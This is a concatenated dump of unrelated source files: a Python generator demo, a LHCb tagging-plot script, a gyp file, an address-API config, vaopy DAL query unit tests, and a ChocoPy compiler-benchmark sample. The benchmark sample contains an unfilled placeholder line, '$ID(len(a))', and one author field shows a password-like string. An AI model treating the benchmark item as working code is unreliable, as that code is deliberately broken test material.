642167e640746fc13d9a13edf17d6d566e7db7ae | bd4270073cbdbafb8471bbdfe9a7fcfc75836384 | /gen_yield_for.py | 29f87e20a29a3bba8bb32624604fd0c06547e069 | [] | no_license | Hemanthtm2/learning.python | 03c5fccb0ca205dba3edd418cbf2fecad34aa532 | c93d30fcb4982f27153a3f649d2bdc4d50c56b1b | refs/heads/master | 2020-04-08T14:19:35.508613 | 2018-10-10T17:17:40 | 2018-10-10T17:17:40 | 159,431,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | #!/usr/bin/python
def print_squares(start,end):
for x in range(start,end):
yield x**2
for n in print_squares(2,5):
print(n)
| [
"[email protected]"
] | |
1c7f5661d1a446f130607f085ddd3c15eec9fba3 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/str_cat-151.py | a0cd8b6099dc04249949a943feb61cd8816d1ab4 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 279 | py | a:str = "Hello"
b:str = "World"
c:str = "ChocoPy"
def cat2(a:str, b:str) -> str:
return a + b
def cat3(a:str, b:str, c:str) -> str:
return a + b + c
print(cat2(a, b))
print(cat2("", c))
print(cat3(a, " ", c))
$ID(len(a))
print(len(cat2(a,a)))
print(len(cat2("","")))
| [
"[email protected]"
] | |
34db2935861aff91fac8d19719716dccc6985fe1 | 71c7683331a9037fda7254b3a7b1ffddd6a4c4c8 | /PhysFit/P2VV/scripts/makeTaggingPlots.py | 9203415e21f19de2f7d583b37d49ab21e2526125 | [] | no_license | pseyfert-cern-gitlab-backup/Urania | edc58ba4271089e55900f8bb4a5909e9e9c12d35 | 1b1c353ed5f1b45b3605990f60f49881b9785efd | refs/heads/master | 2021-05-18T13:33:22.732970 | 2017-12-15T14:42:04 | 2017-12-15T14:42:04 | 251,259,622 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,276 | py | # script paramters
plotsFilePath = 'plots/Reco14/20112012Reco14_tagging.pdf'
dataSetFilePath = '/project/bfys/jleerdam/data/Bs2Jpsiphi/Reco14/P2VVDataSets20112012Reco14_I2Mass_6KKMassBins_2TagCats_HLT2B_20140619.root'
fullDataSetName = 'JpsiKK'
sigDataSetName = 'JpsiKK_sigSWeight'
cbkgDataSetName = 'JpsiKK_cbkgSWeight'
numEstWTagBins = 50
# workspace
from P2VV.RooFitWrappers import RooObject
ws = RooObject(workspace = 'JpsiphiWorkspace').ws()
# read data sets
from P2VV.Utilities.DataHandling import readData
fullData = readData( filePath = dataSetFilePath, dataSetName = fullDataSetName, NTuple = False )
sigData = readData( filePath = dataSetFilePath, dataSetName = sigDataSetName, NTuple = False )
cbkgData = readData( filePath = dataSetFilePath, dataSetName = cbkgDataSetName, NTuple = False )
# get observables
from P2VV.RooFitWrappers import RealVar, Category
estWTagOS = RealVar('tagomega_os_cb')
estWTagSS = RealVar('tagomega_ss_nn')
tagCatOS = Category('tagCatP2VVOS')
tagCatSS = Category('tagCatP2VVSS')
# build PDFs for estimated wrong-tag probabilities
taggedDataOS = sigData.reduce( '%s > 0' % tagCatOS.GetName() )
taggedDataSS = sigData.reduce( '%s > 0' % tagCatSS.GetName() )
from P2VV.RooFitWrappers import HistPdf
tagPdfOS = HistPdf( Name = 'sig_bkg_estWTagOS'
, Observables = [ estWTagOS ]
, Binning = { estWTagOS : numEstWTagBins }
, Data = taggedDataOS
)
tagPdfSS = HistPdf( Name = 'sig_bkg_estWTagSS'
, Observables = [ estWTagSS ]
, Binning = { estWTagSS : numEstWTagBins }
, Data = taggedDataSS
)
# get normalization correction for tagged events
untagFracOS = fullData.table(tagCatOS).getFrac('Untagged')
untagFracSigOS = sigData.table(tagCatOS).getFrac('Untagged')
untagFracBkgOS = cbkgData.table(tagCatOS).getFrac('Untagged')
untagFracSS = fullData.table(tagCatSS).getFrac('Untagged')
untagFracSigSS = sigData.table(tagCatSS).getFrac('Untagged')
untagFracBkgSS = cbkgData.table(tagCatSS).getFrac('Untagged')
# plot estimated wrong-tag probabilities for signal and for background
from ROOT import gStyle
gStyle.SetColorModelPS(1)
from P2VV.Load import LHCbStyle
from P2VV.Utilities.Plotting import plot
from ROOT import TCanvas, kBlue, kFullDotLarge
canvsOS = [ TCanvas( 'estWTagCanvOS%d' % it ) for it in range(3) ]
for ( canv, data, nBins, norm ) in zip( canvsOS
, [ fullData, sigData, cbkgData ]
, 3 * [ numEstWTagBins ]
, [ 1. - untagFracOS, 1. - untagFracSigOS, 1. - untagFracBkgOS ]
) :
canv.SetLeftMargin(0.18)
canv.SetRightMargin(0.05)
canv.SetBottomMargin(0.18)
canv.SetTopMargin(0.05)
#plot( canv, estWTagOS, data, tagPdfOS
plot( canv, estWTagOS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15
, xTitle = '#eta^{OS}'
, yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) )
, frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagOS.GetName() )
, dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 )
#, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm )
)
canvsSS = [ TCanvas( 'estWTagCanvSS%d' % it ) for it in range(3) ]
for ( canv, data, nBins, norm ) in zip( canvsSS
, [ fullData, sigData, cbkgData ]
, 3 * [ numEstWTagBins ]
, [ 1. - untagFracSS, 1. - untagFracSigSS, 1. - untagFracBkgSS ]
) :
canv.SetLeftMargin(0.18)
canv.SetRightMargin(0.05)
canv.SetBottomMargin(0.18)
canv.SetTopMargin(0.05)
#plot( canv, estWTagSS, data, tagPdfSS
plot( canv, estWTagSS, data, yScale = ( 0., None ), xTitleOffset = 1.10, yTitleOffset = 1.15
, xTitle = '#eta^{SSK}'
, yTitle = 'Candidates / %.2f' % ( 0.499999 / float(nBins) )
, frameOpts = dict( Bins = nBins, Range = ( 0., 0.499999 ), Name = estWTagSS.GetName() )
, dataOpts = dict( MarkerStyle = kFullDotLarge, MarkerSize = 0.7, LineWidth = 3 )
#, pdfOpts = dict( LineColor = kBlue, LineWidth = 3, Normalization = norm )
)
for it, canv in enumerate( canvsOS + canvsSS ) :
canv.Print( plotsFilePath + ( '(' if it == 0 else ')' if it == len( canvsOS + canvsSS ) - 1 else '' ) )
# #TODO: Make it availble in the case of cFit
# if AllTagPlots:
# self._estWTagCanvSS_B = TCanvas('estWTagCanvSS_B' , 'Est. wrong-tag probability SS, B' )
# self._estWTagCanvSS_Bbar = TCanvas( 'estWTagCanvSS_Bbar','Est. wrong-tag probability SS, Bbar')
# self._estWTagCanvOS_B = TCanvas( 'estWTagCanvOS_B' ,'Est. wrong-tag probability OS, B' )
# self._estWTagCanvOS_Bbar = TCanvas( 'estWTagCanv0S_Bbar','Est. wrong-tag probability OS, Bbar')
#
# self._estWTagCanvSSOS_B = TCanvas( 'estWTagCanvSSOS_B' , 'Est. wrong-tag probability SS+OS, B' )
# self._estWTagCanvSSOS_Bbar = TCanvas( 'estWTagCanvSS0S_Bbar' , 'Est. wrong-tag probability SS+OS, Bbar' )
# self._estWTagCanvSSOS_BbarB = TCanvas( 'estWTagCanvSS0S_BbarB', 'Est. wrong-tag probability SS+OS, BbarB')
#
# tagCutSS_B = 'tagdecision_ss==tagdecision_ss::B'
# tagCutSS_Bbar = 'tagdecision_ss==tagdecision_ss::Bbar'
# tagCutOS_B = 'tagdecision_os==tagdecision_os::B'
# tagCutOS_Bbar = 'tagdecision_os==tagdecision_os::Bbar'
#
# tagCutComb_B = 'tagdecision==tagdecision::B'
# tagCutComb_Bbar = 'tagdecision==tagdecision::Bbar'
# tagCutComb_BbarB = tagCutComb_B + '|' + tagCutComb_Bbar
#
# for ( pad, data, nBins, BorBbar, titleX, obs )\
# in zip( [ self._estWTagCanvSS_B , self._estWTagCanvSS_Bbar,
# self._estWTagCanvOS_B , self._estWTagCanvOS_Bbar,
# self._estWTagCanvSSOS_B, self._estWTagCanvSSOS_Bbar,
# self._estWTagCanvSSOS_BbarB ]
#
# , [ sigData.reduce(tagCutSS_B ),
# sigData.reduce(tagCutSS_Bbar ),
# sigData.reduce(tagCutOS_B ),
# sigData.reduce(tagCutOS_Bbar ),
# sigData.reduce(tagCutComb_B ),
# sigData.reduce(tagCutComb_Bbar ),
# sigData.reduce(tagCutComb_BbarB) ]
#
# , 7 * [ numEstWTagBins ]
# , 3 * [ 'B', 'Bbar' ] + [ 'BbarB' ]
# , 2 * [ '#eta^{SS}' ] + 2 * [ '#eta^{OS}'] + 3 * [ '#eta^{SS+OS}']
# , 2 * [ estWTagSS ] + 2 * [ estWTagOS ] + 3 * [ estWTagComb ]
# ) :
# plot( pad, obs , data
# , xTitle = titleX
# , yScale = [0, None]
# , frameOpts = dict( Bins = nBins, Title = obs.GetTitle() + BorBbar, Range = ( 0., 0.499999 )
# , Name = obs.GetName() + BorBbar )
# , dataOpts = dict( MarkerStyle = 8, MarkerSize = 0.4 )
# , pdfOpts = dict( LineColor = kBlue, LineWidth = 3 )
# )
| [
"[email protected]"
] | |
58fd807cb9a2b63b9454583672f45c3ed6e352bd | 1213bcf770a94a89b39be8dc7b99a3f7e35fd369 | /src/alloy/tracing/channels/sources.gypi | cfba212621fc7e84a88c971af264625490afb49a | [] | no_license | wtfaremyinitials/xenia | c86e4625a1dd084d97d44c3242e2faf208bca2b8 | 16b3ecd5897051f82bc236ad9a4d0ab5cab22e87 | refs/heads/master | 2020-12-31T02:43:53.168712 | 2014-01-14T22:06:05 | 2014-01-14T22:06:05 | 15,918,955 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | gypi | # Copyright 2013 Ben Vanik. All Rights Reserved.
{
'sources': [
'file_channel.cc',
'file_channel.h',
],
}
| [
"[email protected]"
] | |
988555a631d55ed2a9abdd2e1a296ccacb0d9a19 | 90f46ef9cd25460a05f10a4fb440c396debdb518 | /address_old/app/config.py | b45dabe418e678e9aaad311863de1cb8db82d09b | [] | no_license | khanh-trieu/folder-erp-lap-tsg | addf543c1ed2b27beb0fe9508a4db835e258dc15 | 151335a5f9364d66a456f174e2b621a2d8a9727e | refs/heads/master | 2023-04-19T13:49:28.134422 | 2021-05-20T02:46:32 | 2021-05-20T02:46:32 | 369,057,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py |
API_GET_PROVINCE = 'https://api.mysupership.vn/v1/partner/areas/province'
API_GET_DISTRICT = 'https://api.mysupership.vn/v1/partner/areas/district?province='
API_GET_WARD = 'https://api.mysupership.vn/v1/partner/areas/commune?district='
MSG_SUCCESS = 'Thành công!' | [
"Tsg@1234"
] | Tsg@1234 |
8b21e646fd26e249fa7cc2a641e4665b65831e68 | 0308ca5b152a082c1a206a1a136fd45e79b48143 | /usvao/prototype/vaopy/tickets/VAOPD-892/tests/dal/testQueryNoNet.py | 3feb0711d89be9813fcef7ab72cdca7914c90cad | [] | no_license | Schwarzam/usvirtualobservatory | b609bf21a09c187b70e311a4c857516284049c31 | 53fe6c14cc9312d048326acfa25377e3eac59858 | refs/heads/master | 2022-03-28T23:38:58.847018 | 2019-11-27T16:05:47 | 2019-11-27T16:05:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 27,204 | py | #!/usr/bin/env python
"""
Tests for vaopy.dal.query
"""
import os, sys, shutil, re, imp, glob
import unittest, pdb
from urllib2 import URLError, HTTPError
import vaopy.dal.query as dalq
import vaopy.dal.dbapi2 as daldbapi
# from astropy.io.vo import parse as votableparse
from astropy.io.votable.tree import VOTableFile
from vaopy.dal.query import _votableparse as votableparse
testdir = os.path.dirname(sys.argv[0])
if not testdir: testdir = "tests"
siaresultfile = "neat-sia.xml"
ssaresultfile = "jhu-ssa.xml"
testserverport = 8081
try:
t = "aTestSIAServer"
mod = imp.find_module(t, [testdir])
testserver = imp.load_module(t, mod[0], mod[1], mod[2])
testserver.testdir = testdir
except ImportError, e:
print >> sys.stderr, "Can't find test server: aTestSIAServer.py:", str(e)
class DALAccessErrorTest(unittest.TestCase):
msg = "nya-nya"
url = "http://localhost"
def testProperties2(self):
e = dalq.DALAccessError(self.msg, self.url)
self.assertEquals(self.msg, e.reason)
self.assertEquals(self.url, e.url)
e.reason = "poof"
self.assertEquals("poof", e.reason)
del e.reason
self.assertEquals(dalq.DALAccessError._defreason, e.reason)
def testProperties1(self):
e = dalq.DALAccessError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.url is None)
def testPropertiesDef(self):
e = dalq.DALAccessError()
self.assertEquals(dalq.DALAccessError._defreason, e.reason)
self.assert_(e.url is None)
class DALServiceErrorTest(unittest.TestCase):
msg = "nya-nya"
code = 404
url = "http://localhost/"
def testProperties4(self):
c = HTTPError("http://localhost/", self.code, self.msg, None, None)
e = dalq.DALServiceError(self.msg, self.code, c, self.url)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assertEquals(self.url, e.url)
del e.cause
self.assert_(e.cause is None)
e.cause = c
self.assert_(e.cause is c)
e.code = 505
self.assertEquals(505, e.code)
del e.code
self.assert_(e.code is None)
def testProperties3(self):
c = HTTPError("http://localhost/", self.code, self.msg, None, None)
e = dalq.DALServiceError(self.msg, self.code, c)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assert_(e.url is None)
def testProperties2(self):
e = dalq.DALServiceError(self.msg, self.code)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is None)
self.assertEquals(self.code, e.code)
self.assert_(e.url is None)
def testProperties1(self):
e = dalq.DALServiceError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is None)
self.assert_(e.code is None)
self.assert_(e.url is None)
def testPropertiesDef(self):
e = dalq.DALServiceError()
self.assert_(e.reason and e.reason.startswith("Unknown service "))
self.assert_(e.cause is None)
self.assert_(e.code is None)
self.assert_(e.url is None)
def testFromExceptHTTP(self):
url = "http://localhost/"
c = HTTPError(url, self.code, self.msg, None, None)
e = dalq.DALServiceError.from_except(c)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assertEquals(self.code, e.code)
self.assertEquals(url, e.url)
def testFromExceptURL(self):
url = "http://localhost/"
c = URLError(self.msg)
e = dalq.DALServiceError.from_except(c, url)
self.assertEquals(self.msg, e.reason)
self.assert_(e.cause is c)
self.assert_(e.code is None)
self.assertEquals(url, e.url)
def testFromExcept(self):
c = RuntimeError(self.msg)
e = dalq.DALServiceError.from_except(c)
self.assertEquals(e.reason, "RuntimeError: " + self.msg)
self.assert_(e.cause is c)
self.assert_(e.code is None)
self.assert_(e.url is None)
class DALQueryErrorTest(unittest.TestCase):
msg = "nya-nya"
label = "goofed"
def testProperties2(self):
e = dalq.DALQueryError(self.msg, self.label)
self.assertEquals(self.msg, e.reason)
self.assertEquals(self.label, e.label)
e.reason = "poof"
self.assertEquals("poof", e.reason)
e.label = "OVERFLOW"
self.assertEquals("OVERFLOW", e.label)
del e.label
self.assert_(e.label is None)
def testProperties1(self):
e = dalq.DALQueryError(self.msg)
self.assertEquals(self.msg, e.reason)
self.assert_(e.label is None)
def testPropertiesDef(self):
e = dalq.DALQueryError()
self.assert_(e.reason and e.reason.startswith("Unknown DAL Query "))
self.assert_(e.label is None)
class DALResultsTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
def testCtor(self):
self.result = dalq.DALResults(self.tbl)
self.assert_(isinstance(self.result._fldnames, list))
self.assert_(self.result.votable is not None)
def testProps(self):
self.testCtor()
self.assertEquals(self.result.nrecs, 2)
try:
self.result.nrecs = 4
self.fail("size is not read-only")
except AttributeError:
pass
names = self.result.fieldnames()
self.assert_(isinstance(names, list))
self.assertEquals(len(names), 10)
for i in xrange(len(names)):
self.assert_(isinstance(names[i], str) or
isinstance(names[i], unicode),
"field name #%d not a string: %s" % (i,type(names[i])))
self.assert_(len(names[i]) > 0, "field name #%s is empty" % i)
fd = self.result.fielddesc()
self.assert_(isinstance(fd, list))
self.assertEquals(len(fd), 10)
for fld in fd:
self.assert_(hasattr(fld,'name'))
self.assert_(hasattr(fld,'ID'))
self.assert_(hasattr(fld,'ucd'))
self.assert_(hasattr(fld,'datatype'))
for i in xrange(len(names)):
fld = self.result.getdesc(names[i])
self.assert_(fld is fd[i])
fld = self.result.getdesc("Format")
self.assertEquals(fld.name, "Format")
# self.assertEquals(fld.ID, "Format")
self.assertEquals(fld.ucd, "VOX:Image_Format")
self.assertEquals(fld.datatype, "char")
self.assertEquals(fld.arraysize, "*")
self.assert_(fld.utype is None)
def testValue(self):
self.testCtor()
self.assertEquals(self.result.getvalue("Format", 0), "image/fits")
self.assertEquals(self.result.getvalue("Format", 1), "image/jpeg")
self.assertEquals(self.result.getvalue("Dim", 0), 2)
val = self.result.getvalue("Size", 0)
self.assertEquals(len(val), 2)
self.assertEquals(val[0], 300)
self.assertEquals(val[1], 300)
self.assertRaises(ValueError, self.result.getvalue, "Goober", 0)
def testGetRecord(self):
self.testCtor()
rec = self.result.getrecord(0)
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
rec = self.result.getrecord(1)
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
self.assertRaises(IndexError, self.result.getrecord, 2)
def testGetColumn(self):
self.testCtor()
col = self.result.getcolumn('Ra')
shifted = col + 0.05
self.assertAlmostEquals(0.05, shifted[0]-col[0])
self.assertRaises(ValueError, self.result.getcolumn, 'goob')
def testIter(self):
self.testCtor()
i = 0
for rec in self.result:
self.assert_(rec is not None)
self.assert_(isinstance(rec, dalq.Record))
i += 1
self.assertEquals(i, 2)
def testCursor(self):
self.testCtor()
c = self.result.cursor()
self.assert_(c is not None)
self.assert_(isinstance(c, daldbapi.Cursor))
def testByUcd(self):
self.testCtor()
self.assertEquals(self.result.fieldname_with_ucd("POS_EQ_RA_MAIN"),"Ra")
self.assertEquals(self.result.fieldname_with_ucd("VOX:Image_AccessReference"),"URL")
class RecordTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
self.result = dalq.DALResults(self.tbl)
self.rec = self.result.getrecord(0)
def testFields(self):
fnames = self.result.fieldnames()
reckeys = self.rec.keys()
for name in fnames:
self.assert_(name in reckeys, "Missing fieldname: "+name)
def testValues(self):
self.assertEquals(self.rec["Format"], "image/fits")
self.assertEquals(self.rec["Dim"], 2)
val = self.rec["Size"]
self.assertEquals(len(val), 2)
self.assertEquals(val[0], 300)
self.assertEquals(val[1], 300)
try:
self.rec["Goober"]
self.fail("Failed to raise KeyError on bad key")
except KeyError:
pass
def testSuggestExtension(self):
self.assertEquals(self.rec.suggest_extension("goob"), "goob")
self.assert_(self.rec.suggest_extension() is None)
class EnsureBaseURLTest(unittest.TestCase):
def testFix(self):
self.assertEquals(dalq.ensure_baseurl("http://localhost")[-1], '?')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia")[-1], '?')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat")[-1], '&')
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes")[-1], '&')
self.assertEquals(dalq.ensure_baseurl("http://localhost?"),
"http://localhost?")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?"),
"http://localhost/sia?")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&"),
"http://localhost/sia?cat=neat&")
self.assertEquals(dalq.ensure_baseurl("http://localhost/sia?cat=neat&usecache=yes&"),
"http://localhost/sia?cat=neat&usecache=yes&")
class DALServiceTest(unittest.TestCase):
def setUp(self):
self.baseurl = "http://localhost/sia"
def testCtor(self):
self.res = {"title": "Archive", "shortName": "arch"}
self.srv = dalq.DALService(self.baseurl, "sga", "2.0", self.res)
def testProps(self):
self.testCtor()
self.assertEquals(self.srv.baseurl, self.baseurl)
self.assertEquals(self.srv.protocol, "sga")
self.assertEquals(self.srv.version, "2.0")
try:
self.srv.baseurl = "goober"
self.fail("baseurl not read-only")
except AttributeError:
pass
try:
self.srv.protocol = "sia"
self.fail("protocol not read-only")
except AttributeError:
pass
try:
self.srv.version = "1.0"
self.fail("version not read-only")
except AttributeError:
pass
self.assertEquals(self.srv.description["title"], "Archive")
self.assertEquals(self.srv.description["shortName"], "arch")
self.srv.description["title"] = "Sir"
self.assertEquals(self.res["title"], "Archive")
def testNoResmeta(self):
srv = dalq.DALService(self.baseurl)
self.assertEquals(srv.baseurl, self.baseurl)
self.assert_(srv.description is not None)
self.assert_(hasattr(srv.description, "get"))
self.assertEquals(len(srv.description.keys()), 0)
def testCreateQuery(self):
self.testCtor()
q = self.srv.create_query()
self.assert_(isinstance(q, dalq.DALQuery))
self.assertEquals(q.baseurl, self.baseurl)
self.assertEquals(q.protocol, self.srv.protocol)
self.assertEquals(q.version, self.srv.version)
def testCreateQueryWithKws(self):
self.testCtor()
q = self.srv.create_query(RA=12.045, DEC=-13.08, SR=0.01)
self.assert_(isinstance(q, dalq.DALQuery))
self.assertEquals(q.baseurl, self.baseurl)
self.assertEquals(q.protocol, self.srv.protocol)
self.assertEquals(q.version, self.srv.version)
self.assertAlmostEquals(q.getparam('RA'), 12.045)
self.assertAlmostEquals(q.getparam('DEC'), -13.08)
self.assertAlmostEquals(q.getparam('SR'), 0.01)
class DALQueryTest(unittest.TestCase):
def setUp(self):
self.baseurl = "http://localhost/sia"
def testCtor(self):
self.query = dalq.DALQuery(self.baseurl, "sga", "2.0")
self.assert_(self.query.getparam("format") is None)
def testProps(self):
self.testCtor()
self.assertEquals(self.query.baseurl, self.baseurl)
self.assertEquals(self.query.protocol, "sga")
self.assertEquals(self.query.version, "2.0")
self.query.baseurl = "http://gomer.net/infinite/loop?"
self.assertEquals(self.query.baseurl,
"http://gomer.net/infinite/loop?");
def testParam(self):
self.testCtor()
self.assertEquals(len(self.query.paramnames()), 0,
"param set should be empty: " +
str(self.query.paramnames()))
self.assert_(self.query.getparam("RA") is None)
self.query.setparam("RA", 51.235)
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("RA"), 51.235)
self.query.setparam("RA", 127.235)
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("RA"), 127.235)
self.query.setparam("DEC", -13.49677)
self.assertEquals(len(self.query.paramnames()), 2)
self.assertEquals(self.query.getparam("DEC"), -13.49677)
self.query.unsetparam("FORMAT")
self.assertEquals(len(self.query.paramnames()), 2)
self.query.unsetparam("RA")
self.assertEquals(len(self.query.paramnames()), 1)
self.assertEquals(self.query.getparam("DEC"), -13.49677)
self.assert_(self.query.getparam("RA") is None)
def testQueryURL(self):
self.testCtor()
self.query.setparam("RA", 51.235)
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?RA=51.235')
self.query.setparam("DEC", -13.49677)
qurl = self.query.getqueryurl()
self.assert_(qurl == self.baseurl+'?RA=51.235&DEC=-13.49677' or
qurl == self.baseurl+'?DEC=-13.49677&RA=51.235')
self.query.setparam("SR", "1.0")
qurl = self.query.getqueryurl()
self.assert_(qurl == self.baseurl+'?RA=51.235&SR=1.0&DEC=-13.49677' or
qurl == self.baseurl+'?DEC=-13.49677&SR=1.0&RA=51.235' or
qurl == self.baseurl+'?RA=51.235&DEC=-13.49677&SR=1.0' or
qurl == self.baseurl+'?DEC=-13.49677&RA=51.235&SR=1.0' or
qurl == self.baseurl+'?SR=1.0&DEC=-13.49677&RA=51.235' or
qurl == self.baseurl+'?SR=1.0&RA=51.235&DEC=-13.49677')
def testEncode(self):
self.testCtor()
self.query.setparam("NaMe", "a val")
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?NaMe=a+val')
self.testCtor()
self.query.setparam("NaMe", "a+val")
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?NaMe=a%2Bval')
def testEncodeList(self):
self.testCtor()
self.query.setparam("POS", (5.231, -13.441))
qurl = self.query.getqueryurl()
self.assertEquals(qurl, self.baseurl+'?POS=5.231,-13.441')
class QueryExecuteTest(unittest.TestCase):
def setUp(self):
pass
# self.srvr = testserver.TestServer(testserverport)
# self.srvr.start()
def tearDown(self):
pass
#if self.srvr.isAlive():
# self.srvr.shutdown()
#if self.srvr.isAlive():
# print "prob"
def testExecute(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
results = q.execute()
self.assert_(isinstance(results, dalq.DALResults))
self.assertEquals(results.nrecs, 2)
def testExecuteStream(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
strm = q.execute_stream()
self.assert_(strm is not None)
self.assert_(hasattr(strm, "read"))
results = strm.read()
strm.close()
self.assert_(results.startswith("<?xml version="))
def testExecuteRaw(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
data = q.execute_raw()
self.assert_(data is not None)
self.assert_(isinstance(data, unicode) or isinstance(data, str))
self.assert_(data.startswith("<?xml version="))
def testExecuteVotable(self):
q = dalq.DALQuery("http://localhost:%d/sia" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
results = q.execute_votable()
self.assert_(isinstance(results, VOTableFile))
def testExecuteServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute)
def testExecuteRawServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute_raw)
def testExecuteStreamServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
try:
q.execute_raw()
self.fail("failed to raise exception on bad url")
except dalq.DALServiceError, e:
self.assertEquals(e.code, 404)
self.assertEquals(e.reason, "Not Found")
self.assert_(isinstance(e.cause, HTTPError))
except Exception, e:
self.fail("wrong exception raised: " + str(type(e)))
def testExecuteVotableServiceErr(self):
q = dalq.DALQuery("http://localhost:%d/goob" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
self.assertRaises(dalq.DALServiceError, q.execute_votable)
def testExecuteRawQueryErr(self):
q = dalq.DALQuery("http://localhost:%d/err" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
data = q.execute_raw()
self.assert_(data is not None)
self.assert_(isinstance(data, unicode) or isinstance(data, str))
self.assert_(data.startswith("<?xml version="))
self.assert_('<INFO name="QUERY_STATUS" value="ERR' in data)
def testExecuteQueryErr(self):
q = dalq.DALQuery("http://localhost:%d/err" % testserverport)
q.setparam("foo", "bar")
# pdb.set_trace()
try:
q.execute()
self.fail("failed to raise exception for syntax error")
except dalq.DALQueryError, e:
self.assertEquals(e.label, "ERROR")
self.assertEquals(str(e), "Forced Fail")
except dalq.DALServiceError, e:
self.fail("wrong exception raised: DALServiceError: " + str(e))
except Exception, e:
self.fail("wrong exception raised: " + str(type(e)))
class CursorTest(unittest.TestCase):
def setUp(self):
resultfile = os.path.join(testdir, ssaresultfile)
self.tbl = votableparse(resultfile)
def testCtor(self):
self.result = dalq.DALResults(self.tbl)
self.assert_(isinstance(self.result._fldnames, list))
self.assert_(self.result.votable is not None)
self.cursor = self.result.cursor()
def testCursor(self):
self.testCtor()
self.assert_(self.cursor is not None)
self.assert_(isinstance(self.cursor, daldbapi.Cursor))
self.assertEquals(self.cursor.rowcount, 35)
self.assertEquals(self.cursor.arraysize, 1)
descr = self.cursor.description
self.assert_(len(descr) > 0)
self.assertEquals(descr[1][0], 'AcRef')
self.assert_(isinstance(descr[1][1], daldbapi.TypeObject))
def testInfos(self):
self.testCtor()
infos = self.cursor.infos()
self.assertEquals(int(infos['TableRows']), 35)
def testFetchOne(self):
self.testCtor()
pos = self.cursor.pos
rec = self.cursor.fetchone()
self.assertEquals(self.cursor.pos, pos + 1)
rec2 = self.cursor.fetchone()
# self.assert_(rec != rec2)
self.assertEquals(self.cursor.pos, pos + 2)
def testFetchMany(self):
self.testCtor()
pos = self.cursor.pos
recs = self.cursor.fetchmany()
self.assertEquals(len(recs), self.cursor.arraysize)
recs = self.cursor.fetchmany(size = 5)
self.assertEquals(len(recs), 5)
recs = self.cursor.fetchmany(size = -5)
def testFetchAll(self):
self.testCtor()
recs = self.cursor.fetchall()
self.assertEquals(len(recs), 35)
self.testCtor()
self.cursor.fetchone()
recs = self.cursor.fetchall()
self.assertEquals(len(recs), 34)
def testScroll(self):
self.testCtor()
pos = self.cursor.pos
self.cursor.scroll(5)
self.assertEquals(self.cursor.pos, pos + 5)
self.cursor.scroll(5, mode = "absolute")
self.assertEquals(self.cursor.pos, 5)
try:
self.cursor.scroll(-1, mode = "absolute")
except daldbapi.DataError:
pass
self.cursor.scroll(-1)
self.assertEquals(self.cursor.pos, 4)
class DatasetNameTest(unittest.TestCase):
base = "testds"
def setUp(self):
resultfile = os.path.join(testdir, siaresultfile)
self.tbl = votableparse(resultfile)
self.result = dalq.DALResults(self.tbl)
self.rec = self.result.getrecord(0)
self.cleanfiles()
def tearDown(self):
self.cleanfiles()
def cleanfiles(self):
files = glob.glob(os.path.join(testdir, self.base+"*.*"))
for f in files:
os.remove(f)
def testMime2Ext(self):
